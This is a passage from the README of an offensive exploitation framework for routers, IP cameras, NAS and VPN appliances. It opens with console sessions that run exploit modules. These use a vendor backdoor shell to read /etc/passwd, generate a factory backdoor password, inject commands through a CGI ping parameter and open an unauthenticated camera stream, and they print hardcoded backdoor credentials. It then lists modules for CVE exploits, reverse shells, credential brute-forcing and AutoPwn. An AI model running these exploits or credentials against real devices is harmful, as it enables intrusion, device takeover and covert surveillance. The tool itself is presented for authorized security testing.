exf (Alpha Networks web_shell_cmd RCE) > set cmd "cat /etc/passwd"
exf (Alpha Networks web_shell_cmd RCE) > run
[*] Sending command to /web_shell_cmd.gch: 'cat /etc/passwd'
[+] Response from backdoor shell:
    root:x:0:0:root:/root:/bin/sh
    ...

# RuggedCom — factory backdoor password generator (FD 2012/Apr/277)
exf > use exploits/routers/ruggedcom/ruggedcom_factory_password
exf (RuggedCom Factory Password) > set target 192.168.1.1
exf (RuggedCom Factory Password) > set serial RA000000
exf (RuggedCom Factory Password) > run
[+] Serial Number  : RA000000
[+] Backdoor user  : factory
[+] Backdoor pass  : 7f3d9a2b

# Alcatel-Lucent OmniPCX Enterprise — masterCGI RCE
exf > use exploits/routers/alcatel_lucent/omnipcx_masterCGI_rce
exf (OmniPCX RCE) > set target 192.168.1.10
exf (OmniPCX RCE) > set cmd "id"
exf (OmniPCX RCE) > run
[*] Injecting command: 'id' via /cgi-bin/masterCGI?ping=127.0.0.1&user=;id;
[+] Response (command output may be embedded): uid=0(root) ...

# TRENDnet camera — unauthenticated MJPEG live stream
exf > use exploits/routers/trendnet/camera_mjpeg_unauth
exf (TRENDnet MJPEG) > set target 192.168.1.50
exf (TRENDnet MJPEG) > run
[+] LIVE STREAM accessible (no auth): /anony/mjpg.cgi
[+] Stream URL: http://192.168.1.50:80/anony/mjpg.cgi

# Netgear WG602 — hardcoded backdoor credentials
exf > use exploits/routers/netgear/wg602_superman_backdoor
exf (WG602 Backdoor) > set target 192.168.1.1
exf (WG602 Backdoor) > run
[+] Backdoor login SUCCESS: super:5777364
[*] Admin panel: http://192.168.1.1:80/
```

**All 27 new vendors/modules:**
`alcatel_lucent` · `alpha_networks` · `astoria` · `binatone` · `ddwrt` · `easybox` · `ee` · `freebox` · `mifi` · `motorola` · `observa` · `ruggedcom` · `seagate` · `sitecom` · `starbridge` · `ubee` · `unicorn` · `utstarcom` · `zoom` · plus belkin, netgear, trendnet gap-fills.

---

## Module Structure

```
embedxpl/
├── core/
│   ├── rtsp/          # RTSP camera engine
│   │   ├── client.py  # Raw socket RTSP client (OPTIONS/DESCRIBE/auth/TLS/HTTP-tunnel)
│   │   ├── attacker.py# 5-phase attack pipeline (route→auth→creds→validate→re-attack)
│   │   ├── scanner.py # Network discovery (nmap/masscan/direct), CIDR/range expansion
│   │   └── models.py  # RTSPStream dataclass, AuthType enum
│   └── poly/
│       ├── compiler.py# CCompiler — runtime C/C++ compilation (gcc/clang/mingw/cross)
│       └── runner.py  # PolyRunner — Ruby/Node/PHP/Bash/Perl + Metasploit + ExploitDB
├── modules/
│   ├── creds/             # Credential testing (FTP, SSH, Telnet, HTTP, SNMP)
│   ├── exploits/
│   │   ├── cameras/       # IP camera exploits by vendor
│   │   │   ├── multi/     # Multi-vendor (RTSP cameradar, P2P, ONVIF)
│   │   │   ├── hikvision/ # Hikvision (CVE-2021-36260, CVE-2017-7921, ...)
│   │   │   ├── dahua/     # Dahua + OEMs (CVE-2021-33044, CVE-2020-25078, ...)
│   │   │   ├── axis/      # Axis (CVE-2018-10660, ...)
│   │   │   ├── reolink/   # Reolink (CVE-2021-40655, CVE-2022-30600)
│   │   │   ├── amcrest/   # Amcrest (CVE-2019-3950)
│   │   │   ├── uniview/   # Uniview UNV (CVE-2024-37630)
│   │   │   ├── tapo/      # TP-Link Tapo (CVE-2021-4045)
│   │   │   ├── annke/     # ANNKE DVR/NVR (CVE-2021-32941)
│   │   │   ├── swann/     # Swann DVR/NVR (default creds + RTSP)
│   │   │   └── edimax/    # Edimax IC-7100 (CVE-2025-1316, CISA KEV)
│   │   ├── firmware/      # Firmware flash bypass (NETGEAR, TP-Link, D-Link, ASUS)
│   │   ├── nas/           # NAS exploits (QNAP, D-Link NAS, Zyxel)
│   │   ├── routers/       # Router exploits by vendor (85 vendor folders — see full list below)
│   │   ├── vpn/           # VPN/firewall appliances (Ivanti, Fortinet, SonicWall)
│   │   ├── switches/      # Switch exploits (Cisco, D-Link, NETGEAR)
│   │   └── soho_edge/     # SOHO edge device exploits
│   ├── scanners/          # Network scanning and AutoPwn
│   ├── payloads/          # Reverse/bind shells (multi-arch)
│   ├── encoders/          # Payload encoding (Base64, Hex)
│   └── generic/           # CVE lookup, SNMP, UPnP, SSDP, wordlist tools
├── nse/                   # NSE script manager (Python)
│   ├── manager.py         # NSEManager class — install/uninstall/list/run
│   └── __main__.py        # CLI: python -m embedxpl.nse
├── resources/
│   └── rtsp/
│       ├── routes.txt      # 195+ RTSP stream paths
│       └── credentials.json# 80+ default username:password pairs
└── data/
    └── oui.txt             # IEEE OUI database for MAC-to-vendor lookup

nse/                        # Nmap NSE Lua scripts (pip install embedxpl[nse])
├── embedxpl-rtsp-discover.nse
├── embedxpl-camera-identify.nse
├── embedxpl-hikvision-vuln.nse
├── embedxpl-dahua-vuln.nse
├── embedxpl-rtsp-creds.nse
├── embedxpl-iot-cve-check.nse
└── embedxpl-camera-snapshot.nse
```

## Architecture & Attack Surface Maps

Attack surface maps showing module coverage per access vector, in the style of operational security diagrams.
Source files in [`docs/diagrams/architecture/`](docs/diagrams/architecture/).

### Module Architecture Overview

<p align="center">
  <img src="docs/diagrams/architecture/exf_arch_overview.png" width="900" alt="EmbedXPL-Forge Architecture Overview"/>
</p>

### APT Group Attack Chains

<p align="center">
  <img src="docs/diagrams/architecture/exf_arch_apt_chains.png" width="900" alt="APT Group Attack Chains"/>
</p>

### SOHO Router Attack Surface

<p align="center">
  <img src="docs/diagrams/architecture/exf_arch_soho_router.png" width="900" alt="SOHO Router Attack Surface"/>
</p>

### TP-Link Attack Surface (APT28/GRU Campaign)

<p align="center">
  <img src="docs/diagrams/architecture/exf_arch_tplink_apt28.png" width="900" alt="TP-Link APT28 Attack Surface"/>
</p>

### MikroTik RouterOS Attack Surface

<p align="center">
  <img src="docs/diagrams/architecture/exf_arch_mikrotik.png" width="900" alt="MikroTik Attack Surface"/>
</p>

### GPON ONT Attack Surface (Huawei EG8145)

<p align="center">
  <img src="docs/diagrams/architecture/exf_arch_gpon_ont.png" width="900" alt="GPON ONT Attack Surface"/>
</p>

## Requirements

- Python 3.8+
- Optional: `nmap` (binary) for enhanced network discovery and NSE scripts
- Optional: `masscan` for high-speed RTSP discovery
- Optional: `gcc`/`clang` for PolyExploit C/C++ runtime compilation
- Optional: `msfconsole` for Metasploit integration via PolyRunner

**Python dependencies (auto-installed):**
`requests`, `paramiko`, `pysnmp`, `pycryptodome`, `scapy`, `colorama`, `rich`, `python-nmap`, `aiohttp`

**NSE extras (`pip install "embedxpl[nse]"`):**
`python-nmap` (already included in core)

Full list: [`requirements.txt`](requirements.txt)

## Legal Disclaimer

EmbedXPL-Forge is intended for authorized security testing and research only. Use this tool exclusively on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal. The authors assume no liability for misuse.

## License

BSD License — see [LICENSE](LICENSE) for details.

---

> **Author:** André Henrique ([@mrhenrike](https://github.com/mrhenrike)) | **União Geek** — [https://github.com/Uniao-Geek](https://github.com/Uniao-Geek)
